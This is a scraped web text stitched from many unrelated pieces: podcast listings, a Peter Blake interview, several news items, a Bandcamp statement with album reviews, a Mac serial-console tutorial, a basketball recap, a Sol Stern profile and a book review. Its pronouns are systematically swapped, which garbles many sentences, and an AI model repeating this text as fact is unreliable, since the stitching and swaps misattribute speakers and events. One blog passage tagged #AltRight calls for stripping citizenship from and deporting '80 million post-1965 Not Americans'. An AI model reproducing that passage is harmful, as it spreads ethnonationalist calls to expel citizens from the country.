Sofanaouts, the
[web] [feed] [itunes]
It's a pleasure to listen to Tony and their interesting guests.
Its getting kick-started in a month (that would be April 2010). It was on hold but soon to start again in a slightly different form according to StarShipSofa.
Each week, Tony C Smith will be joined by a variety of guests from the world of science fiction literature, SF blogs and publishing to bring you the latest news and gossip from the world of SF. This is just a couple of mins intro from host of StarShipSofa, Tony C Smith as they lay down their manifesto to what is and what will be: The Sofanauts!
StarShipSofa
[web] [feed] [itunes]
Take a voyage on the Science Fiction podcast StarShipSofa if you dare? Travel into the deepest realms of the classic Sci-fi and science fiction world. Calling at such science fiction destinations as Philip K Dick, Alfred Bester, John Brunner and all the other great Sci Fi writers out there. Then, from science fiction and Sci Fi we travel anywhere our imagination and our podcast take us. All wrapped up and inspired by the great Ronnie Corbett. Intrigued? Want to find out more about our science fiction podcast?. Then travel on the greatest science fiction and Sci Fi ride of your life, the StarShipSofa podcast…. If it's classic science fiction… or sci fi trivia listen no further – science fiction never listened so good!
Tor podcast[web] [feed] [itunes]
Tor presents news, comments and insight on the world of Science Fiction literature. Get the inside story from authors, editors and artists. From the name that has become synonymous with Science Fiction, Tor
Story podcast: [web] [feed] [itunes]
Welcome to Tor.com, a site for news and discussion of science fiction, fantasy, and all the things that interest SF and fantasy readers.
The Geek's Guide to the Galaxy [web] [feed] [itunes]
Geeks have always loved what's smart and fun—from fantasy literature, video games, and graphic novels, to science, technology, and gadgets. It's never been a better time to be a geek, with Lord of the Rings sweeping the Oscars, iPods and iPhones in every pocket, and tales of wizards, vampires, and zombies dominating the bestseller lists. And now being a geek is about to get even better, with the launch of THE GEEK'S GUIDE TO THE GALAXY podcast, the indispensable news and talk show for geeks everywhere. Hosts John Joseph Adams and David Barr Kirtley are two geeks who also happen to be rising young stars in the world of publishing. John, the editor of the bestselling anthologies WASTELANDS and THE LIVING DEAD and the new science fiction magazine LIGHTSPEED, has been called “the reigning king of the anthology world” and was nominated for the World Fantasy Award. David, who has been named “one of the newest and freshest voices in sf,” has published fiction in books such as FANTASY: THE BEST OF THE YEAR and NEW VOICES IN SCIENCE FICTION.
Turning in to SciFi TV
(Farpoint Media)
[web] [feed] [itunes]
Tuning in to SciFi TV (TIST) is where you will find Wendy, Kevin and Brent talking about many of the SciFi and genre shows on TV. Think of us as the viewer's digest, tour guides or sherpas for the genre rather than critics. We'll always share our honest opinions, but we plan to keep things fun. Since everyone has a different viewing pace we'll structure our episodes into segments. The Water Cooler segment is where we have general non-spoilery discussions about different things going on in the genre TV world and other topics that we think you'll find interesting. The Back Porch is where we kick back and go into detail about certain shows or topics. This segment could be about any show, any episode or any plot line. We'll be sure to tell you which shows we discuss in the show notes on our blog and also in the comments on the MP3 file. You can choose to skip that segment in case you're not caught up on that TV show quite yet. We also release a Tuner Minute every week where one member of the crew comments on whatever is on their mind. We invite you to share your thoughts on the subject in the forum or by dropping us a voicemail. And, finally, we also have occasional Blast From The Past segments where we look at good shows that may no longer be running on TV but you can find on DVD, NetFlix, iTunes or other sources.
I like the audio stories and the voice so far. This one is pretty new for me.
[web] [feed] [itunes]
We feature stories selected from the pages of the TTA Press magazines Interzone (science fiction & fantasy), Black Static (horror), and Crimewave (crime & mystery). New stories appear every other Monday
The artist responsible for The Beatles iconic Sgt Pepper's Lonely Hearts Club Band album cover has revealed that at the height of their financial difficulties they had bailiffs at their door.
Sir Peter Blake, 79, was paid just £200 in 1967 for the album cover after their agent signed away copyright and royalties.
They told the Radio Times: "Five years ago I was totally broke.
"I had no cash and no way to earn it. My credit cards were refused and bailiffs turned up at the house. I was very upset. It was to do with tax.
"Now I've reached the happy position that, mainly through printmaking, I'm not likely to be broke again. I earn the right amount for someone of my age and situation in the art world."
Sir Peter, whose artwork on the album cover is in millions of homes, said of fighting for royalties: "I don't feel resentful any more ... One reason I didn't pursue it was our friendship with Paul McCartney."
The pop artist, who is now worth around "a million in property", with their studio, their house and another in the country, spoke as they created a Radio Times souvenir cover portrait of the Queen.
Sir Peter, who criticised Lucian Freud's well-known 2001 portrait of the Queen as "sloppy", was turned down for an official portrait in 1969.
They said: "The Queen declined and chose (Pietro) Annigoni again. I'm guessing they were frightened it would be a pop art picture. It wouldn't have been.
"I'm a royalist. I was in the crowds with my grandmother at their wedding to Philip, the victory parade after the war and lots of royal events."
They said of the royal portraits: "Probably Lucian Freud's is the most important, but it was terrible, even though I'm a great fan."
They said of the 2001 painting: "I don't think they wanted to do it. They resisted for a long time and then gave in for whatever ultimatum - sent to the Tower! It's sloppy. I think they were sulking."
Sir Peter made a wooden sculpture of a Captain Webb matchbox before Andy Warhol depicted a Campbell's soup can.
"A mutual friend suggested we meet when I went to New York. They pretended they didn't know my work, but they must have done," Sir Peter said.
"Over the years we met about eight times but had nothing to say to each other. Then they had a show in London and at a dinner to celebrate it someone came over and said, 'Andy would like to meet you'.
"I refused. I didn't want them pretending he'd never met me. They were patronising and I was stupid. Sadly they died later that year, and I regret we didn't talk.
"I didn't admire their work at the time, but do now."
Sir Peter said they had "shot myself in the foot a couple of times" by telling their agent never to sell to Charles Saatchi and for vowing not to show in New York again following "vicious reviews".
"I've often made moral decisions where I chose not to make money. I could earn more today if I signed on for certain prints, but I want to keep my independence," they said.
"My morality has changed, though. I wouldn't sell myself for anything, but I'd consider any offer."
Ivanka Trump attends a panel discussion titled 'Launch Event Women's Entrepreneur Finance Initiative' on the second day of the G20 summit on July 8, 2017 in Hamburg, Germany. | Ukas Michael/Getty images Trump says Ivanka holding G-20 seat 'very standard'
President Donald Trump defended their daughter for holding their seat at the G-20 summit this weekend, touting German Chancellor Angela Merkel as unlikely backup in the decision.
"When I left Conference Room for short meetings with Japan and other countries, I asked Ivanka to hold seat. Very standard. Angela M agrees!" Trump tweeted Monday morning in a string of responses to current administration concerns. They followed that tweet with another, saying, "If Chelsea Clinton were asked to hold the seat for their mother, as their mother gave our country away, the Fake News would say CHELSEA FOR PRES!"
Story Continued Below
Chelsea Clinton quickly responded to Trump on Twitter Monday morning, writing that it would have been unlikely for them to sit in for either parent.
"Good morning Mr. President. It would never have occurred to my mother or my father to ask me. Were you giving our country away? Hoping not," they wrote.
Trump's eldest daughter sat in for them at Saturday session after the president stepped out, causing swift condemnation from some who said Ivanka Trump is not an elected official, therefore cannot stand in for heads of state.
But the White House echoed Trump's morning tweet and called the reaction overblown over the weekend.
The most reliable politics newsletter. Sign up for POLITICO Playbook and get the latest news, every morning — in your inbox. Email Sign Up By signing up you agree to receive email newsletters or alerts from POLITICO. You can unsubscribe at any time.
One White House official said Ivanka Trump was in the room, but only joined the table after their father stepped away and the World Bank president moved the conversation to issues that would benefit from the World Bank's newly announced women's entrepreneurship initiative.
The same official also said that when other leaders left the room, their seats, too, were briefly filled by others in the delegation.
WASHINGTON — The Senate has confirmed the longtime head of Baltimore's library system to be the next Librarian of Congress.  They are the first woman and the first African-American to hold the position.
The vote was 74-18 for Carla Hayden on Wednesday. President Barack Obama had nominated Hayden to be the 14th Librarian of Congress in the institution's 214-year history. They called their milestones on gender and race “long overdue.”
Obama signed a law last year establishing a 10-year term for the Librarian of Congress with an option for reappointment. The position was previously considered a lifetime appointment.
The previous Librarian of Congress, James Billington, was criticized for not keeping up with advances in technology. Billington was appointed by President Ronald Reagan and served for 28 years before stepping down last year.
Like 98% of U.S. citizens (including the President), I am the descendant of immigrants—my great-grandparents came to America from Russia and Lithuania as teenagers and worked in sweatshops until they were able to afford to bring the rest of their families over. Most everyone you speak to in this country has a similar story to tell, because we are, in fact, a nation of immigrants, bound together by a shared belief in justice, equality, and the freedom to pursue a better life. In this context, last week's Executive Order barring immigrants and refugees from seven Middle Eastern countries from entering the United States is not simply immoral, it violates the very spirit and foundation of America.
Contrary to the assertions of the current administration, the order will not make us safer (an opinion shared by the State Department and many members of Congress including prominent Republicans). Christian religious leaders have denounced both the ban, and the exception prioritizing Christian immigrants, as inhumane. It is an unequivocal moral wrong, a cynical attempt to sow division among the American people, and is in direct opposition to the principles of a country where the tenet of religious freedom is written directly into the Constitution. This is not who we are, and it is not what we believe in. We at Bandcamp oppose the ban wholeheartedly, and extend our support to those whose lives have been upended.
And so all day this Friday, February 3rd (starting at 12:01am Pacific Time), for any purchase you make on Bandcamp, we will be donating 100% of our share of the proceeds to the American Civil Liberties Union, who are working tirelessly to combat these discriminatory and unconstitutional actions.
As another way of showing solidarity with the immigrants and refugees from the seven banned countries—as well as those impacted by the construction of the Mexican border wall—we've compiled a list of albums made by artists from the affected countries (Bandcamp may be incorporated in the United States, but we host artists from every corner of the world). We believe that knowledge and empathy are crucial weapons against fear and intolerance. We hope that, as you listen to these albums, you'll not only discover some great new artists, but will also gain a further appreciation and understanding for the way music transcends all borders, and remember that, even in the darkest of times, there is more that unites us than divides us.
— Ethan Diamond, Bandcamp Founder & CEO
Mexico
Deseo de Muerte
A dreamy pair of tracks from this Mexico City darkwave duo. “Las paredes” keeps the pace of a racing heart; a ticking drum machine and synth harmonics push forward interwoven heavenly vocal melodies and luxe, washed-out ribbons of guitar. “Olvida” is made for the slow sway of the goth club floor. —Jes Skolnik
FZ-10
Fierce raw punk with the kind of clattering d-beat that sounds like it's going to topple over and into itself at any point; its sonic precarity makes it feel all the more urgent. Rippling vocal delay, buzzsaw guitars, a blur of bass: the band says this is a demo (their debut LP came out in 2014), but it sounds better-recorded and more energetic than some official albums we've heard recently. The harsh howl near the end of “Muerte en la ciudad” will make the hair on your arms stand straight up. —Jes Skolnik
Syria
Omar Souleyman
A mournful electrified Syrian oud cries alone on stage, joined eventually by another before the powerful and equally mournful voice of Omar Souleyman joins them on “Mawal Hejaz,” the opening track of Haflat Gharbia: The Western Concerts. Western ears may already be familiar with Souleyman's electro-infused Syrian folk-pop. Souleyman began their career as a singer for wedding parties in northeastern Syria and gained fame throughout the country and the rest of the Arab world through distribution of live recordings on tapes and CDs, eventually reaching a global audience. This album captures the best moments of their live shows between 2009 and 2011, culminating in a groundbreaking performance at the Glastonbury festival. —Ally-Jane Grossan
Theoria
There's no shortage of Syrian metal—in fact a crowdfunding campaign recently reached its goal to make a documentary about the scene. Theoria is Syria's best example of atmospheric black metal, echoing the languid, yet punishing, tempo of their American and European counterparts (the band cites Chaos Moon, Cloudkicker, Darkspace, and Lunar Aurora as influences). Based in the northern Syrian city of Aleppo, the two members (identified as Ahmad and Besher) previously released death metal as Crescent Moon but on Mantra, their debut as Theoria (released by French label Antiq), the guitar sound becomes elegant and the vocals less guttural. —Ally-Jane Grossan
Iraq
Wirephobia
One of the more prolific Iraqi artists on Bandcamp, the Erbil-based Wirephobia has over 40 releases of discordant, experimental noise, including several split singles with other noise artists from around the globe. “Kurdistan” is one of their more accessible releases (although those with sensitive ears should still be wary of turning up the volume), featuring samples of Middle Eastern music that drop suddenly into wells of harsh and crackling noise. It was released as an 8-track cartridge and a very limited edition 12-inch by Rochester, New York-based noise label Useless Prick. —Mariana Timony
Dark Phantom
If you like your metal ultra-raw and super fast, you're going to love Dark Phantom, Iraq's first thrash band. Their backstory is as intense as their music. Started in 2007 as a way to express both their love of metal and their feelings about the shitty situation in their home city of Bagdhad, the band struggled to achieve their dreams as a result of the Iraq war, with members frequently having to go into hiding for their own safety. It took until 2016 for their pummeling, brutal debut Nation of Dogs to make its debut. As a metal record, it slays. As a testament of the band's will to survive, it is a powerful paean to the human spirit. Dark Phantom's bio puts it best: “Music itself means life.” —Mariana Timony
Iran
Akvan
Akvan, named for a Zoroastrian demon who represents the concept of “evil mind” or “evil intention,” blends atmospheric black metal and traditional Iranian folk music to gorgeous, seamless, and unique effect. This is music both deeply visceral and deeply hypnotic. The lyrics pull from classic texts like the Shanameh (“Book of Kings”), the epic poetic retelling of Iranian history that is Iran's answer to the Mahabharata. Be on the lookout, as we've got an interview with Akvan coming in the next few weeks you won't want to miss. —Jes Skolnik
Arsha Samsaminia
Tehran's Arsha Samsaminia enlists a global cast of luminaries from the contemporary classical world, including the Stockholm Saxophone Quartet, Japanese violinist Ken Aiso (who studied in London at the Royal Academy of Music and currently resides in L.A.), the Georgian Tbilisi Contemporary Ensemble (conducted by pianist Nino Jvania), and Italian pianist Andrea Dindo, to play a set of their new compositions. Full of space and ambience, these elegant works are haunting, particularly “Disabling a Bomb Inside the Piano,” which is as tense, delicate, and evocative as its name would suggest.—Jes Skolnik
Libya
Awal Akalin
Awal Akalin from the Tripoli desert blues outfit Chaco puts the genre's hypnotic style on full, riveting display. The recording sounds like it's taken from a live performance: there's chatter between the songs and a few false starts, but all of that only adds to the album's electric feel. The band works up to a steady groove quickly and stays there: the guitars in the title track loop and dart like needlepoint work; “Emari N Yala” is carried along by jubilant gang vocals, guitars and percussion swaying gently—almost imperceptibly—beneath the euphoric shouts. The mood throughout is warm and relaxed—“Aholaghin Ere Yaglan” even has some bent-string riffing that wouldn't be out of place on an American blues record. The songs on Awal Akalin are always in motion: beautiful, serene and hypnotic. —J. Edward Keyes
DJ Strike
Proof that video games know no borders, Tripoli's DJ Strike has assembled a brief EP full of skull-crushing dubstep remixes and covers of beloved console music. What makes the collection work is Strike's giddy sense of humor: the moment in “Luigi's Mansion Dubstep Mix” when the classic EDM “drop” is introduced with the heroic cry, “Mario!” is worth the (low) price of admission in and of itself. But there are other unlikely high points: “Donkey Kong Country 2 Sticker Brush Remix” becomes an emotional slice of synth balladry that wouldn't be out of place on the Twin Peaks soundtrack, while the drum-and-bassy take on the Legend of Zelda theme augments chiptune's Lite Brite bleeps with frantically scurrying rhythms. —J. Edward Keyes
Sudan
Sufyvn
K E R M A—the debut release from Sudanese musician Sufyvn—feels connected to the Los Angeles beat scene, even if the artist themselves is more than 8,500 miles away. Combining glitchy synthetics and obscure Sudanese samples, K E R M A plays like something you'd hear on Stones Throw or Alpha Pup, setting a contemplative mood. “Places,” with its string loop and stuttering percussion, evokes a 1990s jazz-rap hybrid. “Ashrinkall” is remarkably festive, employing a hazy soundscape suited for the dance floor. Dance floors in Africa and the United States. — Marcus J. Moore
Gory
The world needs to dance. I don't mean a casual two-step with overpriced liquor in your hand. I mean a flat-out, “shake your ass ‘till you forget where you are” kind of night. Enter Gory, a North Kurdufan producer, whose newest project here is a EP mixes scant electronic soul and ambient house music. The compositions are dark and hypnotic, full of bleak tinges. In a good way, these sounds pull from nostalgic Quiet Storm R&B without reinventing the past. — Marcus J. Moore
Yemen
❖
❖'s 2013 EP is just four songs long, but what impresses is the way it's able to create a distinct mood in such a short period of time. Its songs are built from weatherbeaten synth tones that crackle and pop—as much distortion as they are melody. On opener “i x u,” a scuffed-up, blown-out synth line is stretched out across depth-charge bass tones, clawing its way from the song's beginning to its end. The mood continues on “n æ o “; the beats thump like an android heartbeat as sandpapered electronics wax and wane. There's much this approach could suggest: the triumph of beauty, no matter how battered; the existence of peace in a grinding post-industrial landscape. But in the end, that kind of speculation is almost beside the point. ❖ has created a small world with their music. The best option is to close your eyes and disappear inside it.—J. Edward Keyes
Somalia
Sahra Halgan Trio
Sahra Halgan's music speaks directly to the old and new, blending traditional Somali songs with Afropop. Much like their previous work, their latest album Faransiskiyo Somaliland partially speaks to their own experience as a refugee of Somaliland. They address the ups and downs of fellow natives, and creates music that debunks widespread hate and violence. Send Donald the Bandcamp link. — Marcus J. Moore
The Obama administration is releasing “increasingly dangerous terrorists” from the detention center at Guantanamo Bay, Cuba, according to the House Permanent Select Committee on Intelligence.
Chairman Devin Nunes, along with 13 other members of congress, sent a letter to President Barack Obama Wednesday objecting the administration's recent release of 15 terrorists to the United Arab Emirates. Obama plans to close the Guantanamo detention center by the end of their term, which has led to increasingly frequent detainee transfers.
“As you continue to draw down the prisoner population at Guantanamo Bay, you are releasing increasingly dangerous terrorists who are more closely linked to al-Qaida and attacks against the U.S. and coalition forces in Afghanistan,” stated the letter. “This largest-ever release includes several who trained in al-Qaida training camps, were bodyguards for [Osama] bin Laden, and fought at Tora Bora.”
Nunes and company point to the release of Baidullah Bertola Obaidullah as posing a particularly egregious risk to national security. The 36-year-old Afghan was captured by U.S. special operations forces in 2002. They were found with schematics for detonators and 23 anti-tank mines, which were likely going to use as improvised explosive devices.
The Obama administration's Periodic Review Board, which is responsible for reviewing and processing detainee releases, reported that Obaidullah was “mostly compliant” because they had committed “less than 100 infractions since their arrival [to Guantanamo] — a low number relative to the other detainees.”
“If 100 infractions is considered a low number, then the bar for acceptable behavior has skewed far from reality,” the letter said.
The Office of the Director of National Intelligence (ODNI) reported in 2015 that between 18 to 30 percent of Guantanamo detainees have re-engaged in terrorism.
The administration's detainee releases in the past year have included some of the most hardened terrorists housed in the detention facility. Many worked directly under bin Laden and their former deputy, and current leader of al-Qaida, Ayman al-Zawahiri. Some of those released, including Salem Abdu Salam Ghereby and Omar Khalif Mohammed — released in April — are considered expert bomb makers, and almost certainly have American blood on their hands.
Nunes and their fellow co-signers urged the president to reconsider their release policy and formulate a new strategy to deal with the dangerous detainees.
“Your actions increase the risk to U.S. forces and any injuries or deaths as a result are solely your responsibility,” warned the members of congress.
Follow Russ Read on Twitter
Send tips to russ@dailycallernewsfoundation.org.
Content created by The Daily Caller News Foundation is available without charge to any eligible news publisher that can provide a large audience. For licensing opportunities of our original content, please contact licensing@dailycallernewsfoundation.org.
I've been using a Mac for quite a while as a systems administrator/network administrator. I don't run into many people that use OSX for their daily machines as administrators, but I think that OS androgyny is more ubiquitous, so I think its apt to write an article on using screen to pick up the serial connection.
First, you need to get a usb/serial cable so that you can use that old Cisco Rollover Cable. I picked up one from NewEgg that fit the bill. I made sure it had the PL2303 chipset for nice cross platform compatibility.
Second, you can find an easy way out of this by using software such as SecureCRT that will do all the work for you.
So, plug in that cable to the Mac and the Switch and lets get working!
Open the ‘Terminal' app and take a look at your USB devices by typing,
ls /dev/tty\.*
When my device was plugged in I had an additional ‘/dev/tty.usbserial'
We'll simply
screen /dev/tty.usbserial
;
This will drop you into screen. How do you use screen?
Quick helpful commands:
help is ctrl+a ?
kill a screen session is ‘screen -ls' then screen -X -S {session#} quit
detach a screen ctrl+a d
resume a screen
Here is a bit more about screen than you ever wanted to know.
If you want to get really fancy, here is a .screenrc file that I use:
hardstatus alwayslastline hardstatus string '%{= kG}[ %{G}%H %{g}][%= %{=kw}%?%-Lw%?%{r}(%{W}%n*%f%t%?(%u)%?%{r})%{w}%?%+Lw%?%?%= %{g}][%{B}%Y-%m-%d %{W}%c %{g}]' vbell off defscrollback 5000
To use this file, from the Terminal type
vi /Users/{username}/.screenrc
Get into INSERT mode by pressing ‘:i'
and paste normally with cmd+v
Don't forget to have fun.
I say, I say... Danilo Gallinari may be psychic. Or at least prescient. Let me explain.
Earlier this week, my colleague Jeff Morton wrote a great piece about the Denver Nuggets need for Danilo Gallinari to grow into a leadership role this season, starting with their Eurobasket stint alongside the Italian national team this summer. Just before Jeff wrote their article, Gallinari got off to a hot start in a first-game loss to Turkey.
A few games later, Danilo seems to have read Mr. Morton's mind, and may end up being the star of the tourney. After watching as much of the four games as I could find online, here's a quick look at Gallo's (mostly) torrid pace, and how that may translate to their upcoming Nuggets season.
Saturday, September 5th - Italy vs. Turkey
Gallinari comes out of the gates on fire with a 33 point, five rebound evening that was only marred by their one free throw miss (14 of 15 on the evening) which would have tied the game in the closing seconds. Gallo put Italy on their back, scoring 38% of their team's points and shooting 90% from the floor on the evening (eight of eight on two-pointers, and splitting their pair of treys).
Though Italy's defense was relatively porous throughout the game, Gallo was also excellent and active on the defensive end, with Turkey making up all their lost ground on the Italian squad when Gallo finally took a breather. Though the evening ended in a narrow loss, Il Gallo had an incredible evening. They also got under the skin of Turkish center Semih Erden...
Sunday, September 6th - Italy vs. Iceland
Gallo poured a lot of energy into the loss against Turkey, and had a quiet night against Iceland the following day, with four points on two-of-four shooting from the field. Gallo still made a number of contributions in their 18 minutes, pulling down 10 rebounds, with seven coming on the defensive end. Though Gallo didn't have their customary scoring punch, their team scored the last 10 points of the game to take Iceland 71-64.
Tuesday, September 8th - Italy vs. Spain
A night off got Danilo back in prime form, with 29 points, eight boards and six assists in 36 minutes of play. Gallo was once again torrid from the free throw line, going 13 of 14 from the stripe. Gallo kept Pau Gasol and Spain very busy down low, to great effect later in the game.
Gallo showed their usual efficient play throughout the evening, still getting a ton of reps to Marco Belinelli and Andrea Bargnani all game. Gallo's offense kept spreading the floor for open looks for Belinelli, who went seven of eight from beyond the arc in the second half.
Wednesday September 9th - Italy vs. Germany
Back-to-back games didn't pull Gallinari down twice, as Italy matched up against Dirk Nowitzki and host country Germany yesterday. Gallo had their most complete game of the tourney thus far, with 25 points, nine boards and a pair of assists to go with what looked to be Italy's best man defense.
To top it all off, Gallo hit the late-game shot that brought Italy back from a 10-point deficit that tied the game and sent it into overtime. The primarily-German crowd was stunned by the late turn of fortune, in a game that many Eurobasket fans are labeling an instant classic. Here's Gallo at their Eurobasket finest:
So... Il Gallo is kicking ass in Germany. What does all of that translate to for their averages in the tourney thus far? Here are Gallinari's rankings amongst all 267 players listed as playing:
#1 in: Free Throws Made (10.0), Free Throws Attempted (11.0), Drawn Fouls (8.5), and 2 Pt Field Goal Percentage (75.0%)
#2 in: Points Per Game (22.8)
#3 in: Field Goal Percentage (62.2%)
#5 in: Minutes (32.0)
#6 in: Free Throw Percentage (90.9%)
#7 in: Total Rebounds (8.0)
#10 in: Offensive Rebounds (2.5)
#11 in: Field Goals Made (5.8)
#12 in: Defensive Rebounds (5.5)
Pretty sweet stuff, no? Though not against NBA-level competition, there are a lot of names playing in Eurobasket this season you'll recognize, and play has been quite good. What might Gallinari's success mean for the upcoming Nuggets season?
Danilo seems to have taken their leadership role with Italy quite seriously, and has repeatedly discussed their aspirations for the Nuggets and their play in articles throughout the offseason. Will they come to Denver ready to lead the squad? Signs point to great things. And though the break has seemed unbearably long, this happened only 22 weeks ago...
Aside from hoping that beard never returns, it looks like a new day is dawning for the Rooster, and he's already starting to crow.
I know I said I was going off to play Zelda, and I am. But this statement needs to be spread far and wide. I'm still in disbelief even after watching it. I said I was going to do a wrap-up of the Rotterdam stuff later on this evening, and I still think it deserves its own post. This is a good starter, though. Geert Wilders, the Party for Freedom leader who is running for Prime Minister of the Netherlands on Wednesday, just put Turkey and their dumbass voters on full blast. I don't think I've ever heard such a definitive statement from a politician.
They flat-out tells Turkey they aren't getting into the Eurpeaon Union and that they only have themselves to blame after voting in an Islamic thug like Erdoğan.
Hundreds of pro-Turkey protesters scuffled with police as authorities tried to end a demonstration at the Turkish consulate in Rotterdam, where a Turkish minister fruitlessly tried to enter the compound. At one stage, protesters were throwing bottles and mobbing police vehicles as they moved away from the consulate in central Rotterdam. But soon, police charged on horseback and moved forward with batons wielding.
They are not. And they never will be . That's why they have to go back.Wilders was speaking in response to last night's Turkish riots in Rotterdam It's time for the God-Emperor to tell the 80 million post-1965 Not Americans the same thing. They are not Americans and they never will be. America desperately needs its own Reconquista while Europe launches its version 2.0.600,000 Mexicans were stripped of their US citizenship and deported by President Eisenhower. So don't even try to claim it's not possible or that it's not Constitutional. It is possible, it is legal, it is Constitutional, and there is legal precedent for both naturalized and natural-born citizens. And most of all, it is absolutely necessary for the survival of the USA, the American people, and Western civilization.You may not like to hear that. But history clearly dictates that the two most likely alternatives are a) continent-wide war or b) the end of Western civilization.
Labels: #AltRight, #AltWest, immigration
Many of Mr. Stern's allies — among them Thomas W. Carroll, the president of the Foundation for Education Reform and Accountability, which supports vouchers and charter schools, and Jay P. Greene, another fellow at the institute — fired off responses to their essay, leading City Journal to post them in an online forum, a first for the magazine.
“I think they made mistaken claims,” Mr. Greene said in an interview. “He claimed that the evidence that vouchers have been effective was very meager, and I do not believe that's the case. The research community is settled on this.”
Mr. Stern is known as a contrarian; they support mayoral control of the school system but frequently criticizes Mayor Michael R. Bloomberg's efforts. Yet rarely has they backed away from their own views.
Despite their many earlier City Journal articles calling for vouchers and charter schools, in the new essay Mr. Stern focused on the shortcomings of the voucher movement. They argued that in recent years, vouchers had steadily lost political support. And citing the need for a “Plan B,” they urged educators to focus on improving curriculums instead. To support their idea, Mr. Stern pointed to Milwaukee's experiment with school vouchers.
“Milwaukee's public schools still suffer from low achievement and miserable graduation rates, with test scores flattening in recent years,” Mr. Stern wrote. “Violence and disorder throughout the system are as serious as ever. Most voucher students are still benefiting, true; but no ‘Milwaukee Miracle,' no transformation of the public schools, has taken place.”
In their online opposition, Mr. Greene said they were particularly bothered because the essay was being widely interpreted as setting up a choice between vouchers and curriculum changes.
“There's no reason you can't have both — just like you like brownies and ice cream,” Mr. Greene said. “You shouldn't be made to choose.”
Advertisement Continue reading the main story
In a recent wide-ranging interview in the institute's offices, Mr. Stern described themselves with a mix of pride and self-deprecation, brushing off efforts to label them politically. They said they saw themselves as a kind of revolutionary who was now simply reporting and writing about issues they cared about.
“I'm a reporter,” they said, as if stating the obvious.
Their 2003 book, “Breaking Free: Public School Lessons and the Imperative of School Choice,” relied on their own trips to Milwaukee to measure the impact of the voucher system on public schools there. In the book, they found much to praise about vouchers, saying they would give needed competition to the failing schools. But now they say more recent evidence has fallen short.
“People have to pay attention to what's going on,” they said, their gravelly voice somewhat incongruous to their broad smile. “They have to respond. I am not ideological about this.”
To describe their current political outlook, Mr. Stern refers to an adage coined by Irving Kristol: A neoconservative is a “liberal mugged by reality.”
Photo
“I'm a liberal whose children were mugged by the public schools,” Mr. Stern said.
Their history with the city's schools goes back to their childhood. Just before World War II, Mr. Stern immigrated with their parents from what was then Palestine. The family settled near Fordham Road in the Bronx, where Mr. Stern attended Public School 6 until eighth grade. They went on to Stuyvesant High School and City College, and then started but did not finish a doctorate in political science at the University of California, Berkeley.
At Berkeley, they became entranced, they said, by the left-wing student movement and dropped out to write for the radical magazine Ramparts, gaining national attention. One of their most famous articles included assertions that the Central Intelligence Agency had infiltrated the National Student Association, a group of student governments, as part of its Cold War strategy.
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
Like other neoconservatives, however, Mr. Stern began splitting with the left over the Middle East, reacting to what they saw as an anti-Israel philosophy. In the early 1970s, they became curious about their family's history and returned to the renamed Israel for the first time since they were a toddler. On that trip, Mr. Stern found themselves “falling in love with the country,” they said, and they later met their wife in Jerusalem.
They moved back to New York City in the mid-70s, where Mr. Stern continued writing for several magazines and newspapers. In the '80s, they met the City Council president, Andrew Stein, through a mutual acquaintance and became their chief of staff.
Although they were involved in several political campaigns with Mr. Stein, who was a Democrat, Mr. Stern said they were never involved in the city's Democratic political circles. And while their political views have gradually changed to what they call “somewhat traditionally conservative,” Mr. Stern has remained a registered Democrat, partly out of “inertia” and the desire to have a vote in the primaries. (He voted for Senator Hillary Rodham Clinton last week and says they will probably vote for Senator John McCain in November.)
Advertisement Continue reading the main story
Mr. Stern prefers personal anecdotes to describe their political evolution. While they were working for Mr. Stein, they were often able to take their children to school near their home on the Upper West Side. One morning, they spotted a man they assumed was homeless wandering through the schoolyard.
“He looked terrible — battered clothes, a worn shopping bag — just terrible,” they said, grimacing at the memory.
As they tell it, they turned to another parent standing nearby and asked, “Where did they come from? Should we call somebody?”
The parent smiled and replied, “You don't know him? That's Malcolm, one of our new teachers!”
Mr. Stern became curious and set off to ask the principal about the disheveled instructor.
“She just looked at me and said, ‘I can't do anything about it; that's seniority,' ” Mr. Stern said. “It was all about the teacher's contract. If they wanted to transfer into the school, they could, simply based on how long they had been in the system.”
Much of Mr. Stern's criticisms of the schools center on the teachers' union, which they say is a “vested interest with far too much power,” pointing to its objections to longer school days and its demands for more money.
Still, Mr. Stern has been equally critical of Mayor Bloomberg and their schools chancellor, Joel I. Klein, frequent opponents of the unions. While they applaud the philosophical underpinnings of many of the administration's decisions, like giving principals more latitude in hiring teachers, they contend that they have made many changes, like the new school report cards, haphazardly and quickly.
“They are only accountable once, for re-election,” they said. “But they act as though this is the greatest thing in education since Horace Mann or John Dewey.
Advertisement Continue reading the main story
“He's been able to do that effectively by sheer portrayal,” Mr. Stern said of the mayor. “It's as though they view the schools as props.”
Mr. Stern's criticisms can be irksome to members of the city's Education Department, but they are heard.
“Sol is a pundit, and pundits have lots of ideas,” said David Cantor, a spokesperson for the department. “Some of theirs have been helpful.”
Despite their obvious appetite for stirring controversy, Mr. Stern can sound as though they are on the edge of despair.
“We've been arguing about the same things for the last 10 years,” they said. “Sometimes I tell my friends that I have fallen into the trap of writing about the two most intractable problems in the world: American education and the Middle East.”
Despite being seen as a 'high risk group', specific targeting for the suicide program will not happen
Israel's gay teens are attempting suicide at an alarming rate, but a group says they are being ignored.
The group Israel Gay Youth has submitted a paper to the government calling them to do more to help prevent teens attempting to kill themselves.
They say LGBTI teens attempt suicide at a rate of 20%, compared with 2.5% for teens overall.
‘Despite the government's decision and despite the clear figures we have cited, gay young people are not recognized as a risk group and are not specifically addressed in the national program and the activities of the council to prevent suicide,' the paper says.
Ran Leabel of Israel Gay Youth has said the Health Minister Yael German has told them that even though the government ‘recognized' gay youth has a suicide rate, it will not due to budgetry difficulties care specifically for the community.
In a statement from the Health Ministry, it states: ‘The gay community is seen as a high-risk group like youth, the elderly, immigrants from Ethiopia, immigrants from the former Soviet Union, divorced fathers and others, which the local authorities take care of.
‘[Israel Gay Youth should] present their troubles to the council and receive an explanation about the program, as representatives of other groups have done.
‘Specific training is being planned as part of the national program to prevent suicide.'
How Sweden became Multicultural
M. Eckehart
Helsingborg, Sweden: Logik Förlag, 2017
This brief (96 pages) study of the historical origins of Sweden's multicultural policy was published ten years ago in Swedish, but has just now been made available to the English reading public. It is not a history of immigration to Sweden, which would require a much longer treatment, but of the spread and triumph of the multicultural idea. Massive extra-European immigration only happened afterwards, partly as a consequence of this shift in thinking.
